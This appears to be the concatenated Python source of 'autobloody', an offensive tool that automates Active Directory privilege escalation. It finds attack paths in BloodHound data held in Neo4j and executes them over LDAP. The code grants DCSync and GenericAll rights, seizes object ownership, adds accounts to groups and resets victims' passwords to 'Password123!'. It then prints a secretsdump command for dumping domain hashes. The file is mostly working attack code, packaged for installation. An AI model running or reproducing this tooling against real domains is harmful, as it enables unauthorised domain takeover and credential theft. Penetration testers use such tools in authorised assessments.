from bloodyAD import config, modules, utils

LOG = utils.LOG
class Automation:
    def __init__(self, args, path):
        self.co_args = args
        self.path = path
        self.rel_types = {
            0 : self._nextHop,
            1 : self._dcSync,
            2 : self._setDCSync,
            3 : self._ownerDomain,
            100 : self._addMember,
            200 : self._aclGroup,
            300 : self._ownerGroup,
            100000 : self._forceChangePassword,
            100001 : self._aclObj,
            100002 : self._ownerObj,
            100100 : self._forceChangePassword,
            100101 : self._aclObj,
            100102 : self._ownerObj,
            250: self._genericAll,
            350: self._ownerSpecialObj
        }
        self.dirty_laundry = []


    def simulate(self):
        self.simulation = True
        self.rel_str = {
            "setDCSync" : "[Add DCSync right] to {}",
            "delObjectFromGroup" : "[Add member] {} to the group {}",
            "setGenericAll" : "[Add GenericAll right] to {} for {}",
            "setOwner" : "[Give ownership] to {} for {}",
            "changePassword" : "[Change password] of {} to {}"
        }
        print(f"\nAuthenticated as {self.co_args.username}:\n")
        self._unfold()
        
    
    def exploit(self):
        self.simulation = False
        self.conn = config.ConnectionHandler(self.co_args)
        self._unfold()
        self.conn.close()
    

    def _unfold(self):
        for rel in self.path:
            if not self.simulation:
                LOG.info("")
            typeID = rel['cost']
            try:
                self.rel_types[typeID](rel)
            except Exception as e:
                self._washer()
                raise e
                


    def _washer(self):
        if self.simulation:
            print()
        self.dirty_laundry.reverse()
        for laundry in self.dirty_laundry:
            if self.simulation:
                self._printOperation(laundry['f'].__name__, laundry['args'], True)
            else:
                laundry['f'](self.conn, *laundry['args'])
        self.dirty_laundry = []


    def _switchUser(self, user, pwd):
        self._washer()
        if self.simulation:
            print(f"\nAuthenticated as {user}:\n")
        else:
            self.conn.switchUser(user, pwd)


    def _nextHop(self, rel):
        return
    

    def _dcSync(self, rel):
        if not self.simulation:
            print(f"[+] You can now dump the NTDS using: secretsdump.py '{self.conn.conf.domain}/{self.conn.conf.username}:{self.conn.conf.password}@{self.conn.conf.host}'")
    

    def _setDCSync(self, rel):
        operation = modules.setDCSync
        if self.simulation:
            user = rel['start_node']['name']
            self._printOperation(operation.__name__, [user])
        else:
            user = rel['start_node']['distinguishedname']
            operation(self.conn, user)
    

    def _ownerDomain(self, rel):
        self._setOwner(rel)
        self._setDCSync(rel)


    def _addMember(self, rel):       
        operation = modules.delObjectFromGroup
        if self.simulation:
            member = rel['start_node']['name']
            group = rel['end_node']['name']
            self._printOperation(operation.__name__, [member, group])
        else:
            member = rel['start_node']['objectid']
            group = rel['end_node']['distinguishedname']
            modules.addForeignObjectToGroup(self.conn, member, group)
            self.conn.close()
        self.dirty_laundry.append({'f':operation, 'args':[member,group]})


    def _aclGroup(self, rel):
        self._genericAll(rel)
        self._addMember(rel)
    

    def _ownerGroup(self, rel):
        self._setOwner(rel)
        self._aclGroup(rel)
    

    def _aclObj(self, rel):
        self._genericAll(rel)
        self._forceChangePassword(rel)
    

    def _ownerObj(self, rel):
        self._setOwner(rel)
        self._aclObj(rel)
    

    def _ownerSpecialObj(self, rel):
        self._setOwner(rel)
        self._genericAll(rel)


    # TODO: change password change with shadow credentials when it's possible
    # TODO: don't perform change password if it's explicitly refused by user
    def _forceChangePassword(self, rel):
        pwd = 'Password123!'
        operation = modules.changePassword
        if self.simulation:
            user = rel['end_node']['name']
            self._printOperation(operation.__name__, [user, pwd])
        else:
            user = rel['end_node']['distinguishedname']
            operation(self.conn, user, pwd)
            user = utils.getObjAttr(self.conn, user, 'sAMAccountName')['attributes']['sAMAccountName']
            LOG.debug(f'[+] switching to LDAP connection for user {user}')
        self._switchUser(user, pwd)


    def _genericAll(self, rel):
        operation = modules.setGenericAll
        if self.simulation:
            user = rel['start_node']['name']
            target = rel['end_node']['name']
            self._printOperation(operation.__name__, [user, target])
        else:
            user = rel['start_node']['distinguishedname']
            target = rel['end_node']['distinguishedname']
            operation(self.conn, user, target)
        self.dirty_laundry.append({'f':operation, 'args':[user,target,'False']})
    

    def _setOwner(self, rel):
        operation = modules.setOwner
        if self.simulation:
            user = rel['start_node']['name']
            target = rel['end_node']['name']
            self._printOperation(operation.__name__, [user, target])
        else:
            user = rel['start_node']['distinguishedname']
            target = rel['end_node']['distinguishedname']
            operation(self.conn, user, target)
    

    def _printOperation(self, operation_name, operation_args, revert=False):
        operation_str = "\t"
        if revert:
            operation_str += "[-] Revert "
        else:
            operation_str += '[+] '

        operation_str += self.rel_str[operation_name]
        arg_nb = operation_str.count('{')
        print(operation_str.format(*operation_args[:arg_nb]))

        



from neo4j import GraphDatabase
import logging

class Database:

    def __init__(self, uri, user, password):
        logging.getLogger("neo4j").setLevel(logging.WARNING)
        self.driver = GraphDatabase.driver(uri, auth=(user, password))
        self._prepareDb()

    def getPrivescPath(self, source, target):
        with self.driver.session() as session:
            relationships = session.read_transaction(self._findShortestPath, source, target)
        return relationships

    def close(self):
        self.driver.close()
    
    def _prepareDb(self):
        with self.driver.session() as session:
            session.write_transaction(self._setWeight)
            session.write_transaction(self._createGraph)

    @staticmethod
    def _setWeight(tx):
        # Existing edges on https://github.com/BloodHoundAD/BloodHound/blob/master/docs/data-analysis/edges.rst
        bloodycosts = [
            {'cost':0, 'edges':'MemberOf', 'endnode':'Group'},
            {'cost':100, 'edges':'AddMember|GenericAll|GenericWrite|AllExtendedRights|Contains', 'endnode':'Group'},
            {'cost':200, 'edges':'WriteDacl|Owns', 'endnode':'Group'},
            {'cost':300, 'edges':'WriteOwner', 'endnode':'Group'},
            

            {'cost':1, 'edges':'DCSync|GenericAll|GetChangesAll|AllExtendedRights', 'endnode':'Domain'},
            {'cost':2, 'edges':'WriteDacl|Owns', 'endnode':'Domain'},
            {'cost':3, 'edges':'WriteOwner', 'endnode':'Domain'},

            {'cost':100000, 'edges':'GenericWrite|GenericAll|ForceChangePassword|AllExtendedRights|Contains', 'endnode':'User'},
            {'cost':100001, 'edges':'WriteDacl|Owns', 'endnode':'User'},
            {'cost':100002, 'edges':'WriteOwner', 'endnode':'User'},

            {'cost':100100, 'edges':'GenericWrite|GenericAll|ForceChangePassword|AllExtendedRights|Contains', 'endnode':'Computer'},
            {'cost':100101, 'edges':'WriteDacl|Owns', 'endnode':'Computer'},
            {'cost':100102, 'edges':'WriteOwner', 'endnode':'Computer'},

            # If we already have GenericAll right on OU we must ensure inheritance so we'll add a new GenericAll ACE with inheritance
            {'cost':0, 'edges':'Contains|GenericWrite|GenericAll', 'endnode':'OU'},
            {'cost':250, 'edges':'WriteDacl|Owns', 'endnode':'OU'},
            {'cost':350, 'edges':'WriteOwner', 'endnode':'OU'},

            {'cost':0, 'edges':'GenericWrite|GenericAll|Contains', 'endnode':'GPO'},
            {'cost':250, 'edges':'WriteDacl|Owns', 'endnode':'GPO'},
            {'cost':350, 'edges':'WriteOwner', 'endnode':'GPO'}          
        ]
        for bloodycost in bloodycosts:
            tx.run(f"MATCH ()-[r:{bloodycost['edges']}]->(:{bloodycost['endnode']}) SET r.bloodycost = {bloodycost['cost']}")
        
        # Specific for Contains edges to handle inheritence
        #for bloodycost in bloodycosts:
        #    tx.run(f"MATCH (:OU {{blocksinheritance:False}})-[r:{bloodycost['edges']}]->(:{bloodycost['endnode']}) SET r.bloodycost = {bloodycost['cost']}")

    @staticmethod
    def _createGraph(tx):
        graph_exists = tx.run("RETURN gds.graph.exists('autobloody')").single()[0]
        if graph_exists:
            tx.run("CALL gds.graph.drop('autobloody')")
        tx.run("CALL gds.graph.project('autobloody','*',{all:{type:'*', properties:{bloodycost:{defaultValue:9999999999}}}},{validateRelationships:true})")

    # Alternative with only CYPHER https://liberation-data.com/saxeburg-series/2018/11/28/rock-n-roll-traffic-routing.html
    # CONS: Less efficient, more complex PROS: Doesn't need GDS plugin
    @staticmethod 
    def _findShortestPath(tx, source, target):
        # result = tx.run("MATCH (source {name: $source}), (target {name: $target}) "
        # "CALL gds.shortestPath.dijkstra.stream({"
        # "nodeQuery:'MATCH (n) RETURN id(n) AS id, labels(n) AS labels', "
        # "relationshipQuery:'MATCH (n)-[r]->(m) RETURN id(n) AS source, id(m) AS target, r.bloodycost as bloodycost', "
        # "sourceNode: source, targetNode: target, relationshipWeightProperty: 'bloodycost'}) "
        # "YIELD path "
        # "RETURN path", source=source, target=target)
        result = tx.run("MATCH (s {name:$source}), (t {name:$target}) "
        "CALL gds.shortestPath.dijkstra.stream('autobloody',{sourceNode:s, targetNode:t, relationshipWeightProperty:'bloodycost'})"
        "YIELD path RETURN path",source=source, target=target)
        return result.single()[0].relationships
    
    # @staticmethod
    # def _retrieveCheaperEdge(tx, start, end):
    #     result = tx.run("MATCH (start)-[r]->(end) WHERE id(start)=$start and id(end)=$end RETURN r ORDER BY r.bloodycost LIMIT 1", start=start, end=end)
    #     return result.single()[0]



from ctypes import *
import os
import socket
import platform
from bloodyAD import utils

LOG = utils.LOG

class ProxyBypass():
    proxy_connect = None
    
    def __init__(self):
        proxy_detected = 'LD_PRELOAD' in os.environ and 'proxychains' in os.environ['LD_PRELOAD']
        LOG.info("[*] Connection to Neo4j")
        if not proxy_detected:
            LOG.info("[*] No proxy detected")
            return
        supported_platform = platform.system() in ["Darwin", "Linux"]
        if not supported_platform:
            LOG.warning(f"[-] Proxy detected but {plateform.system()} is not currently supported. Please raise an issue on the Github repo")
            return
        
        self.proxy_connect = socket.socket.connect

        socket.socket.connect = real_connect
        LOG.info("[+] Proxy bypass enabled for Neo4j connection")
    
    def disable(self):
        if self.proxy_connect:
            socket.socket.connect = self.proxy_connect
            LOG.info("[+] Proxy bypass disabled")


class c_addrinfo(Structure):
    pass
c_addrinfo._fields_ = [
    ('ai_flags', c_int),
    ('ai_family', c_int),
    ('ai_socktype', c_int),
    ('ai_protocol', c_int),
    ('ai_addrlen', c_size_t),
    ] + ([
        ('ai_canonname', c_char_p),
        ('ai_addr', POINTER(c_sockaddr_in)),
    ] if platform.system() == 'Darwin' else [
        ('ai_addr', c_void_p),
        ('ai_canonname', c_char_p),
    ]) + [
        ('ai_next', POINTER(c_addrinfo)),
]

def real_connect(sock_obj, addro):
    libc = CDLL('libc.so.6')
    get_errno_loc = libc.__errno_location
    get_errno_loc.restype = POINTER(c_int)
    def errcheck(ret, func, args):
        if ret == -1:
            e = get_errno_loc()[0]
            raise OSError(e)
        return ret

    # addr = c_sockaddr_in(sock_obj.family, c_ushort(socket.htons(addro[1])), (c_byte *4)(*[int(i) for i in addro[0].split('.')]))
    # size_addr = sizeof(addr)
    c_getaddrinfo = libc.getaddrinfo
    c_getaddrinfo.errcheck = errcheck
    presult = POINTER(c_addrinfo)()
    hints = c_addrinfo()
    hints.ai_family = sock_obj.family
    hints.ai_socktype = sock_obj.type
    hints.ai_flags = 0
    hints.ai_protocol = sock_obj.proto
    c_getaddrinfo(addro[0].encode('utf-8'), str(addro[1]).encode('utf-8'), byref(hints), byref(presult))

    # Wait until DB response
    blocking = sock_obj.getblocking()
    sock_obj.setblocking(True)

    c_connect = libc.connect
    c_connect.errcheck = errcheck
    c_connect(sock_obj.fileno(), c_void_p(presult.contents.ai_addr), presult.contents.ai_addrlen)

    libc.freeaddrinfo(presult)

    sock_obj.setblocking(blocking)

# class c_sockaddr_in(Structure):
#     _fields_ = [
#         ('sa_family', c_ushort),
#         ('sin_port', c_ushort),
#         ("sin_addr", c_byte * 4),
#         ("__pad", c_byte * 8)
#     ]


from setuptools import setup
from pathlib import Path
this_directory = Path(__file__).parent
long_description = (this_directory / "README.md").read_text()

setup(name='autobloody',
      version='0.1.1',
      description='AD Privesc Automation',
      long_description=long_description,
      long_description_content_type='text/markdown',
      author='CravateRouge',
      author_email='baptiste.crepin@ntymail.com',
      url='https://github.com/CravateRouge/autobloody',
      download_url='https://github.com/CravateRouge/bloodyAD/archive/refs/tags/v0.1.1.tar.gz',
      packages=['autobloody'],
      license='MIT',
      install_requires=['bloodyAD>=0.1','neo4j>=4.4.6'],
      keywords = ['Active Directory', 'Privilege Escalation'],
      classifiers=[
        'Intended Audience :: Information Technology',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
        'Programming Language :: Python :: 3.8',
        'Programming Language :: Python :: 3.9',
        'Programming Language :: Python :: 3.10'
      ],
      python_requires='>=3.6',
      entry_points={
        "console_scripts":["autobloody = autobloody.main:main"]
      }
)


#!/usr/bin/env python3
import argparse, json, sys
from autobloody import automation, database, proxy_bypass

def main():
    parser = argparse.ArgumentParser(description='AD Privesc Automation', formatter_class=argparse.RawTextHelpFormatter)

    # DB parameters
    parser.add_argument("--dburi", default="bolt://localhost:7687", help="The host neo4j is running on (default is \"bolt://localhost:7687\")")
    parser.add_argument("-du", "--dbuser", default="neo4j", help="Neo4j username to use (default is \"neo4j\")")
    parser.add_argument("-dp", "--dbpassword", help="Neo4j password to use", required=True)
    parser.add_argument("-ds", "--dbsource", help="Case sensitive label of the source node (name property in bloodhound)", required=True)
    parser.add_argument("-dt", "--dbtarget", help="Case sensitive label of the target node (name property in bloodhound)", required=True)

    # Exploitation parameters
    parser.add_argument('-d', '--domain', help='Domain used for NTLM authentication')
    parser.add_argument('-u', '--username', help='Username used for NTLM authentication')
    parser.add_argument('-p', '--password', help='Cleartext password or LMHASH:NTHASH for NTLM authentication')
    parser.add_argument('-k', '--kerberos', action='store_true', default=False)
    parser.add_argument('-c', '--certificate', help='Certificate authentication, e.g: "path/to/key:path/to/cert"')
    parser.add_argument('-s', '--secure', help='Try to use LDAP over TLS aka LDAPS (default is LDAP)', action='store_true', default=False)
    parser.add_argument('--host', help='Hostname or IP of the DC (ex: my.dc.local or 172.16.1.3)', required=True)

    if len(sys.argv)==1:
            parser.print_help(sys.stderr)
            sys.exit(1)
            
    args = parser.parse_args()

    path_dict = pathgen(args)

    automate = automation.Automation(args, path_dict)
    automate.simulate()
    execute_path = input("\n\nApply this privesc?(y/n)")
    if execute_path == 'y':
        automate.exploit()
        print("\n[+] Done, attack path executed")
    else:
        print("\n[-] Attack path not executed")


def pathgen(args):
    bypass = proxy_bypass.ProxyBypass()
    db = database.Database(args.dburi, args.dbuser, args.dbpassword)

    path = db.getPrivescPath(args.dbsource, args.dbtarget)
    path_dict = []
    for rel in path:
        start_node = {'name':rel.start_node['name'], 'distinguishedname':rel.start_node['distinguishedname'], 'objectid':rel.start_node['objectid']}
        end_node = {'name':rel.end_node['name'], 'distinguishedname':rel.end_node['distinguishedname'], 'objectid': rel.end_node['objectid']}
        path_dict.append({'start_node':start_node, 'end_node':end_node, 'cost':rel['cost']})

    db.close()
    bypass.disable()

    print(f"[+] Done, {len(path_dict)} edges have been found between {args.dbsource} and {args.dbtarget}")
    return path_dict


if __name__ == '__main__':
    main()
